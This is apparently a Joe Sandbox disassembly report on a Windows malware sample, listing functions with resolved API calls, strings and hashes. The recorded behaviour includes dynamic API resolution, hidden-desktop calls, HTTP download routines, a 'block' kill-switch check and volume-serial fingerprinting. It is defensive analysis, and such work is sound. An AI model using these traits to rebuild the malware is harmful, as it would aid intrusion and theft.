GetProcAddress.KERNEL32(758D0000,0090AE60), ref: 00426DAC
GetProcAddress.KERNEL32(758D0000,0090E648), ref: 00426DC5
GetProcAddress.KERNEL32(758D0000,008E3478), ref: 00426DDD
GetProcAddress.KERNEL32(758D0000,008E3398), ref: 00426DF5
GetProcAddress.KERNEL32(758D0000,0090AB40), ref: 00426E0E
GetProcAddress.KERNEL32(76BE0000,0090E6D8), ref: 00426E2E
GetProcAddress.KERNEL32(76BE0000,008E3318), ref: 00426E46
GetProcAddress.KERNEL32(76BE0000,00908130), ref: 00426E5F
GetProcAddress.KERNEL32(76BE0000,0090E6C0), ref: 00426E77
GetProcAddress.KERNEL32(76BE0000,0090E630), ref: 00426E8F
GetProcAddress.KERNEL32(76BE0000,008E3358), ref: 00426EA8
GetProcAddress.KERNEL32(76BE0000,008E3378), ref: 00426EC0
GetProcAddress.KERNEL32(76BE0000,0090E6F0), ref: 00426ED8
GetProcAddress.KERNEL32(76BE0000,0090E660), ref: 00426EF1
GetProcAddress.KERNEL32(76BE0000,CreateDesktopA), ref: 00426F07
GetProcAddress.KERNEL32(76BE0000,OpenDesktopA), ref: 00426F1E
GetProcAddress.KERNEL32(76BE0000,CloseDesktop), ref: 00426F35
GetProcAddress.KERNEL32(75670000,008E34B8), ref: 00426F51
GetProcAddress.KERNEL32(75670000,0090E678), ref: 00426F69
GetProcAddress.KERNEL32(75670000,0090EB28), ref: 00426F82
GetProcAddress.KERNEL32(75670000,0090EBE8), ref: 00426F9A
GetProcAddress.KERNEL32(75670000,0090EAC8), ref: 00426FB2
GetProcAddress.KERNEL32(759D0000,008E3198), ref: 00426FCE
GetProcAddress.KERNEL32(759D0000,008E32B8), ref: 00426FE6
GetProcAddress.KERNEL32(76D80000,008E3338), ref: 00427002
GetProcAddress.KERNEL32(76D80000,0090EA50), ref: 0042701A
GetProcAddress.KERNEL32(6F5C0000,008E33B8), ref: 0042703A
GetProcAddress.KERNEL32(6F5C0000,008E31D8), ref: 00427052
GetProcAddress.KERNEL32(6F5C0000,008E3418), ref: 0042706B
GetProcAddress.KERNEL32(6F5C0000,0090EB10), ref: 00427083
GetProcAddress.KERNEL32(6F5C0000,008E33D8), ref: 0042709B
GetProcAddress.KERNEL32(6F5C0000,008E33F8), ref: 004270B4
GetProcAddress.KERNEL32(6F5C0000,008E3438), ref: 004270CC
GetProcAddress.KERNEL32(6F5C0000,008E34D8), ref: 004270E4
GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 004270FB
GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 00427112
GetProcAddress.KERNEL32(75480000,0090EB88), ref: 0042712E
GetProcAddress.KERNEL32(75480000,009081C0), ref: 00427146
GetProcAddress.KERNEL32(75480000,0090EC90), ref: 0042715F
GetProcAddress.KERNEL32(75480000,0090EA80), ref: 00427177
GetProcAddress.KERNEL32(753B0000,008E34F8), ref: 00427193
GetProcAddress.KERNEL32(6C7D0000,0090EBB8), ref: 004271AF
GetProcAddress.KERNEL32(6C7D0000,008E3518), ref: 004271C7
GetProcAddress.KERNEL32(6C7D0000,0090EA68), ref: 004271E0
GetProcAddress.KERNEL32(6C7D0000,0090ECA8), ref: 004271F8

Strings

1Wu, xrefs: 00426A0B
OpenDesktopA, xrefs: 00426F13
InternetSetOptionA, xrefs: 004270F0
HttpQueryInfoA, xrefs: 00427107
P2Wu, xrefs: 00426918
CreateDesktopA, xrefs: 00426F01
CloseDesktop, xrefs: 00426F2A

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA$P2Wu$1Wu
API String ID: 2238633743-1673689602
Opcode ID: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
Instruction ID: b02b475b7c59bcec4fa92d45c25333ea948ef94e2fcc8a3fd8fff9104c503747
Opcode Fuzzy Hash: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
Instruction Fuzzy Hash: 29625EB9A103009FD758DF65ED88AA637BBF789345300A91DF95683364DBB4A800DFB0

Function 0041F300 Relevance: 104.4, APIs: 57, Strings: 2, Instructions: 1164stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042D01C,00000001,00000000,00000000), ref: 0041F32E
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F34C
lstrlenA.KERNEL32(0042D01C), ref: 0041F357
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F371
lstrlenA.KERNEL32(0042D01C), ref: 0041F37C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F396
lstrcpy.KERNEL32(00000000,00435564), ref: 0041F3BE
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F3EC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F422
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F454
lstrlenA.KERNEL32(008E2E78), ref: 0041F476
lstrcpy.KERNEL32(00000000,?), ref: 0041F506
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F52B
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F5E2
StrCmpCA.SHLWAPI(?,ERROR), ref: 0041F894
lstrlenA.KERNEL32(009080B0), ref: 0041F8C2
lstrcpy.KERNEL32(00000000,009080B0), ref: 0041F8EF
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F912
lstrcpy.KERNEL32(00000000,?), ref: 0041F966
lstrcpy.KERNEL32(00000000,009080B0), ref: 0041FA28
lstrcpy.KERNEL32(00000000,00908260), ref: 0041FA58
lstrcpy.KERNEL32(00000000,?), ref: 0041FAB7
StrCmpCA.SHLWAPI(?,ERROR), ref: 0041FBD5
lstrlenA.KERNEL32(00402E3E), ref: 0041FC03
lstrcpy.KERNEL32(00000000,00402E3E), ref: 0041FC30
lstrcpy.KERNEL32(00000000,00000000), ref: 0041FC53
lstrcpy.KERNEL32(00000000,?), ref: 0041FCA7

Strings

>.@, xrefs: 0041FBFB, 0041FD3A
ERROR, xrefs: 0041F788, 0041F88E, 0041FB30, 0041FBCF, 0041FE70, 0041FF0F

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: >.@$ERROR
API String ID: 367037083-1486603279
Opcode ID: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
Instruction ID: cc5225f4657195739226e2497bd3095dc8a2c9716357749900c22e5d1458564d
Opcode Fuzzy Hash: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
Instruction Fuzzy Hash: 3CA26D70A017028FC720DF25D948A5BBBE5AF44304F18857EE8499B3A1DB79DC86CF99

Function 004056C0 Relevance: 98.7, APIs: 51, Strings: 5, Instructions: 734
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(00000000,?), ref: 004056EF
lstrlenA.KERNEL32(?), ref: 00405742
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405784
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057C3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057F3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405828

Strings

------, xrefs: 00405B0B, 00405BFC, 00405CEA
", xrefs: 00405BA4, 00405C92, 00405D80
~A, xrefs: 0040576C, 00405FEA, 00405E90
------, xrefs: 00405929, 00405956
--, xrefs: 0040598F, 004059B7

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: ------$"$--$------$~A
API String ID: 367037083-2106860866
Opcode ID: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
Instruction ID: 212b4b6a8a6c145a7523e110c63bb65051ea1ed7585ae654da97c7ff09dcb277
Opcode Fuzzy Hash: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
Instruction Fuzzy Hash: 20426A71E006199BCB10EBB5DD89A9F77B5AF04304F44502AF905B72A1DB78ED028FE8

Function 00418D00 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 174
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(?,block,?,?,?,?,0042081F), ref: 00418D1A
ExitProcess.KERNEL32 ref: 00418D27
strtok_s.MSVCRT ref: 00418D39

Strings

block, xrefs: 00418D0B

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
Instruction ID: d61f0b7eaf725463d85374e156b8a22592a45d2bf89fa87c178f2814d4d341aa
Opcode Fuzzy Hash: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
Instruction Fuzzy Hash: 675160B1A047019FC7209F75EC88AAB77F6EB48704B10582FE452D7660DBBCD4828F69

Function 00406B80 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00406BAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406C02
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406C15
StrCmpCA.SHLWAPI(?,00910380), ref: 00406C2D
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406C55
HttpOpenRequestA.WININET(00000000,GET,?,0090FDD0,00000000,00000000,-00400100,00000000), ref: 00406C90
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406CB7
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406CC6
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406CE5
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406D3F
lstrcpy.KERNEL32(00000000,?), ref: 00406D9B
InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406DBD
InternetCloseHandle.WININET(00000000), ref: 00406DCE
InternetCloseHandle.WININET(?), ref: 00406DD8
InternetCloseHandle.WININET(00000000), ref: 00406DE2
lstrcpy.KERNEL32(00000000,00000000), ref: 00406E03

Strings

GET, xrefs: 00406C8A
ERROR, xrefs: 00406CF2

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
String ID: ERROR$GET
API String ID: 3687753495-3591763792
Opcode ID: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
Instruction ID: f53a93b1956779abd9a8e71fe9530673e78fc1538c85e26cedc949aa3c7bae39
Opcode Fuzzy Hash: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
Instruction Fuzzy Hash: C1818071B00215ABEB20DFA4DC49BAF77B9AF44700F114169F905F72D0DBB8AD058BA8

Function 0245003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0245024D

Strings

cess, xrefs: 0245018D
kernel32.dll, xrefs: 0245008F, 02450095

Memory Dump Source

Source File: 00000003.00000002.1975683991.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2450000_4CC1.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: c9fbaced24b664d85f2f51353405923b56babc5c95e3065eb613141c6d6e0ca0
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 3D525D75A01229DFDB64CF58C985BADBBB1BF09304F1480DAE94DA7352DB30AA85CF14

Function 004226E0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,00908120), ref: 0042271B
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0042A470,00000000,00000000,00000000,00000000,?,00908120), ref: 0042274C
GetProcessHeap.KERNEL32(00000000,00000104,?,00908120), ref: 004227AF
HeapAlloc.KERNEL32(00000000,?,00908120), ref: 004227B6
wsprintfA.USER32 ref: 004227DB

Strings

C, xrefs: 00422725
:\, xrefs: 00422735

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
String ID: :\$C
API String ID: 1325379522-3309953409
Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction ID: 1140a15a3936c49260c842706b5d3ee9313ab901dfb0a5368262f5a6e36a0845
Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction Fuzzy Hash: D63181B1908219AFCB14CFB89A859EFBFB8FF58740F40016EE505E7250E2748A008BB5

Function 00405570 Relevance: 12.1, APIs: 8, Instructions: 112
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00405589
RtlAllocateHeap.NTDLL(00000000), ref: 00405590
InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 004055A6
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 004055C1
InternetReadFile.WININET(?,?,00000400,00000001), ref: 004055EC
KiUserExceptionDispatcher.NTDLL(00000000,?,00000001), ref: 00405611
InternetCloseHandle.WININET(?), ref: 0040562B
InternetCloseHandle.WININET(00000000), ref: 00405632

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000005B9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000638000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000064A000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_4CC1.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateDispatcherExceptionFileProcessReadUser
String ID:
API String ID: 1337183907-0
Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction ID: 854f5e81363ebd755ef7060f84f674ff8e42ebe29511b49783b395d7a9db8b06
Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction Fuzzy Hash: EA416C70A00605AFDB24CF55DC48FABB7B5FF48304F5484AAE909AB390D7B69941CF98

Function 00421BD0 Relevance: 12.1, APIs: 8, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1974878121.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1974878121.0000000000443000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000048E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000496000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004AF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CC000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.00000000004CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000506000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000513000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000532000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000540000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.000000000055B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.1974878121.0000000000596000.00000040.00000001.01000000.00000005.sdmpDownload File
